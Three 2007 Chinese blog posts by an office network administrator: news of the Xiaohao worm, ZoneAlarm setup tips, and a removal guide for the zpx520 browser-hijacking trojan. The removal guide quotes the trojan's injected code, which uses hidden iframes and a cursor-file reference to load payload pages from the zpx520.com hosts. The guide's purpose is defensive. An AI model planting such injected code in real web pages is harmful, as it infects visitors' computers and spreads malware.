病毒凶猛

作者: JZ | 08/16 2007, 08:18

14日,周二微软发布了有史以来的几个最严重的安全漏洞公告。自己随后从网上下载下来给系统打上.但360安全卫士查出来系统还有一个.NetFramework 2.0的一个重要补丁NDP20-KB928365-X86。但自己无论是用手动还是用奇虎自身的下载安装功能都无法将这个补丁大上去。无奈之下,在网上搜索了一番。才知道许多人都有着相同的问题。自己看了一下,大致原因好像是.NetFramework本身的版本较低。解决方法有两种;一是下载超级兔子魔法设置。利用其自身的系统补丁功能从网上下载补丁并进行安装。另外就是将电脑原有版本的.NetFramework卸载掉。并下载2.0版本的。之后再打上补丁即可。自己试了一下,补丁成功打了上去。高兴之余,让人实在搞不懂,微软的技术人员搞出了这么一个搞怪的补丁,需要用户卸载掉软件本身后重新安装才能打上补丁。希望.NetFramework后面的补丁不要是这个样子。

有意思的是14号那天,一种新的蠕虫病毒开始在网上悄悄作案。江民反病毒监测中心监测小浩蠕虫病毒在网上现身。这次的小浩威力比熊猫烧香更甚。从目前的技术分析报告来看,病毒集成了熊猫烧香和AV终结者的“优点”。利用网页恶意代码同多系统漏洞对电脑进行感染。之后,进入系统中将其中的.exe文件进行感染,并对原文件进行覆盖式读写。同时将图标变成一个“浩”字,最后的结果就是系统宕掉了之后电脑都无法重启。整个系统数据全部丢失。和它的前辈一样,小浩也通过U盘等移动介质进行传播。

16号,网上还没有出现小浩的专杀工具。当然江民也没有正式工具出来,最稳妥的防御办法就是打全系统补丁,同时将杀毒软件升级到最新病毒库。并电脑中的重要数据进行备份。做到防患于未然。

互联网从CERN的一个内部网络发展到现在这样的一个巨大的全球信息网,科技的发展起了主要作用,但同时各种病毒,木马,间谍软件,恶意网站早已成为网民网络生活中不可或缺的东西,现在,上网已俨然成为了风险行为。几乎每天都有各式各样的病毒或者木马出现在网上,照这样的趋势反战下去,可能大家没有插上网线上网了。魔高一尺,道就告一仗。平时的安全防护知识就很重要,杀毒软件,查杀木马软件,防火墙,流行病毒专杀工具都应尽量备齐。同时养成一个良好的上网习惯。不然,迟早倒霉的就是你自己。

PS:今天赶紧部门的电脑全都打上了补丁。自己虽然是部门的网管,从工作到现在,已经和众多的病毒(其中包括AV终结者)以及木马有过亲密接触,现在意识到安全防护是如何重要的,而自己将江民,AVG Antispyware, ZoneAlarm, 奇虎安全卫士,超级兔子魔法设置,ICESWORD以及各种病毒专杀工具都安在了电脑上。但就这样,仍然担心电脑某一天遭到不测。而部门的同事倒是没有这种不安的程度,中了毒,只要电脑上的数据不丢失。一切都无关紧要。因为他们认为网管会帮忙。

铸造网络安全的铜墙铁壁---ZoneAlarm使用心得

作者: JZ | 08/12 2007, 05:23
自从用电脑开始,自己一直用的是天网,但几个星期前,换了新的电脑。天网却出现了水土不服。安装之后程序频频出现错误。从网上搜索了之后得知好像是天网的一个bug,多次卸载都无法解决问题。最后没有办法只得寻找天网的替代品。

无意中发现了TopTen上的07年全球十大防火墙测评,其中ZoneAlarm在各项测试中均位居第一。冲着ZA在海外的口碑,于是自己下载了Zone Alarm Pro试用了一下。一段时间下来, 感觉ZA的功能十分强大。除了基本的防火墙的功能之外,ZA的反间谍软件功能,电子邮件,用户隐私以及个人重要信息的保护等功能能够全面保护用户的电脑数据安全。但美中不足的是ZA的上手不是很容易。相关操作也比天网复杂。如果是第一次使用ZA的用户,建议先阅读一下相关的使用资料(如ZoneAlarm设置攻略)。

从一开始的完全不熟悉到现在的熟悉,自己也有一些小小的使用心得。在这里分享一下。

ZA安装完成并重启电脑后,桌面迟迟无法显示。

ZA安装完成并重启电脑后,ZA程序开始运行。默认设置是禁用系统当前所有活动的程序。 调出任务管理器,新建explorer.exe,点击确定后,桌面即正常显示。接下来,对有关系统进行设置。打开Programe Control中的Programes项目:然后找到Windows NT Logon ApplicationWindows Logon UI两个程序,将其Trusted Level设置为Trusted或Super,然后将Access下面的TrustedInternet设置为Allow。设置完成后,下一次重启电脑,桌面以及任务栏就会正常显示。

开始使用ZA时,感觉浏览器打开网页的速度很慢。

第一次使用时,ZA根据用户的系统环境对相关程序自动设置。如FirefoxIE。如果使用IE,在ZA运行的情况下,不会出现浏览速度变慢的情况。如果使用的是FF,有时会出现网页无法正常显示的情况,浏览缓慢。在Programes里找到Generic Host Process for Win32 Services(svchost.exe)Client Server Runtime Process(csrss.exe)和上述同样的设置,即可正常速度浏览网页。此外,建议对Run a DLL as an App, Services and controller appLSA Shell (Export Version)也进行相同的设置。

启用了Identity Protection里的Identity Lock功能后,在登陆公司的邮箱以及其他网络账户时,FF经常提示说是否允许将机密信息发送到某个IP地址(并非自己网络帐号所对应的IP地址)。


将自己的所有网络账户对应的网站分别添加进Identity Protection面板的Trusted SitesPrivacy面板的Site ListFirewall面板中的Zones 里,另外在Site List对自己添加的网站的Site Option(点击站点的名称选择Options即可)Cookies Ad BlockingMobile Code进行相关设定。设置完成之后保存,最后在Zones里将FF提示的陌生IP地址添加为blocked站点,点击Apply即可。再次登陆自己的网络账户时,不再出现FF的提示。

另外,在Privacy里的设置Cookies Control时,建议将等级设置为Med,一方面禁止一些网站跟踪cookies的信息,另一方面,可以让一些网页能正常显示。

上面的几点心得只是自己在使用ZA遇到的一些问题。并不具有代表性。可能其他人在使用也会出现各种问题。那就需针对下药了。ZA其他的一些功能需要在后面的使用中慢慢挖掘。不得不提的是,自从开始使用ZA,上述几个问题一直困扰自己,差点让自己对ZA失去信息,最终还是坚持了下来。看来高技术含量,多功能有时不见得是件好事。我个人的ZA使用建议:能使用天网就使用天网。一般的电脑使用者更是强烈建议。技术狂人就另当别论了。

PS:从安装ZA到最后完成,都没有看到安装某某插件说明。说真的,ZA的界面很大气,很专业。反观天网,安装过程中,如果眼睛没有擦亮,电脑就会装上恶意软件,这至少从一个侧面反映出了国内和国外的互联网环境的差距。

zpx520木马综合解决方案

作者: JZ | 07/03 2007, 08:34

(这篇日志本来是上周五贴到博客上的,因为时间关系今天才贴上来)

早晨Jefferson说电脑的浏览器的速度非常慢,好多网站都打不开。随意开一个网页,在浏览器的Internet区域会显示正在连接http://www.zpx520.com/0.htm这个网页。并且含有杀毒字样的网页被强行关闭。
分析: 用Google搜索了一下。结果显示这个网站含有恶意木马。并且有许多网友都反映浏览器出现了同样的问题。并且中招后极难清除。而且反复感染。最明显的状况是浏览器被劫持。感染网页调用了http://q.zpx520.com/1.htm,在该页面上的代码调用http://w.zpx520.com/0.exe用来下载病毒并进行传播。杀毒软件检测该病毒为Win32.HTML.Autoruner。

翻阅了众多了资料之后,对这个网址有了一些了解。www.zpx520.com/0.htm在网页中嵌入了如下的一行代码:
<iframe src='http://www.zpx520.com/0.htm' width=0 height=0></iframe>
一旦用户浏览器打开了含有上述代码的网页,就立刻会被劫持 并指向http://www.zpx520.com/0.htm下载木马。等到用户浏览其它网页,病毒就会自动在其它网页中添加下列代码:
<iframe src='http://www.zpx520.com/0.htm' width=0 height=0>
<HTML>
<BODY style='CURSOR: url(http://q.zpx520.com/w.js)'>
</BODY>
</HTML>
<iframe src="http://q.zpx520.com/1.htm" width="0" height="0" frameborder="0">
<script src='http://s111.cnzz.com/stat.php?id=430086&web_id=430086' language='JavaScript' charset='gb2312'>
<script src='http://s61.cnzz.com/stat.php?id=474270&web_id=474270' language='JavaScript' charset='gb2312'>
致使打开任何一个页面前首先会加载该恶意页面重新挂马。
感染此病毒的浏览器会被劫持并通过微软操作系统的一个漏洞(光标漏洞)并在局域网内进行ARP欺骗攻击。网内其它电脑会立刻被感染。被作攻击服务器,并且伪装为路由IP。
解决方法: 给感染的电脑打上微软MS07-017补丁,然后断开网线。安装ARP防火墙或者Anti ARP Sniffer(点击下载)。之后安装AVG Antispyware(点击下载)对系统进行快速扫描。以清除病毒下载的恶意木马。将杀毒软件升级到最新病毒库进入到安全模式下查杀病毒。最后用360度安全卫士或是IE修复工具对IE进行修复。
对于局域网内首先被感染的机子可以用以下手动清除方法:
1。下载费尔木马强制删除器工具(点击下载),然后解压缩打开PowerRmw.exe,在文件名处输入:"c:windowssystem32driversndnap.sys"(如果系统提示未找到文件,则退出利用上面的方法解决),并勾选“抑制文件再次生成”最后点击清除来删除该文件。
2。重启计算机
3。用工具SREng(点击下载)进行如下操作:
打开SREng--->启动项目---->服务---->驱动程序如下项删除:
ndnap / ndnap][Running/Boot Start]
      <SystemRootSystemRootSystem32driversndnap.sys><N/A>

PS:继昨天晚上喝多之后,今晚又喝多了。还好意识基本上比较清醒。奇怪的是在Firefox中写这篇日志,FF基本上挂起。而在IE7中非常轻松地就写完了。